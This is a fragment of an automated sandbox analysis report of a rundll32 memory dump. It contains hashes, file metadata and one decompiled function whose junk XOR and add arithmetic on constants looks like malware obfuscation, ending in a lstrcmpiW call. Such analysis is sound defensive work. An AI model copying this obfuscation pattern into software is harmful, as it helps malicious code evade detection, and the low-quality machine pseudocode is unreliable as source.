                                                                                                                      • Instruction ID: 7ded739a77acca7f0f3f54e6a463ef4169227bf96d911c5dc6473abc52285046
                                                                                                                      • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                      • Instruction Fuzzy Hash: FBF03C7190130CFBEB04DBE8DA46A9DFBB4EB50314F2081A9D604B3261E7B05F459A91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 305 1bb23c-1bb2c6 call 1c20b9 call 1caa30 lstrcmpiW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E001BB23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				void* _t27;
                                                                                                                      				int _t32;
                                                                                                                      
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E001C20B9(_t27);
                                                                                                                      				_v12 = 0x6268;
                                                                                                                      				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                      				_v12 = _v12 + 0xffff2919;
                                                                                                                      				_v12 = _v12 + 0xffff3e3d;
                                                                                                                      				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                      				_v8 = 0xa46433;
                                                                                                                      				_v8 = _v8 + 0x98ba;
                                                                                                                      				_v8 = _v8 | 0xc390ebe9;
                                                                                                                      				_v8 = _v8 + 0xd5b0;
                                                                                                                      				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                      				E001CAA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                      				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                      				return _t32;
                                                                                                                      			}








                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 001BB2C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563579684.00000000001B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563637304.00000000001D3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                      • Instruction ID: 6b78322d998bafa5638b0655cf7b4f2c03eab40b98b820dd96ba5adec3972063
                                                                                                                      • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                      • Instruction Fuzzy Hash: F7011A72C04608FFDF45DFD4DD468AEBB75EB54304F108189F90566152E3718B609B51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%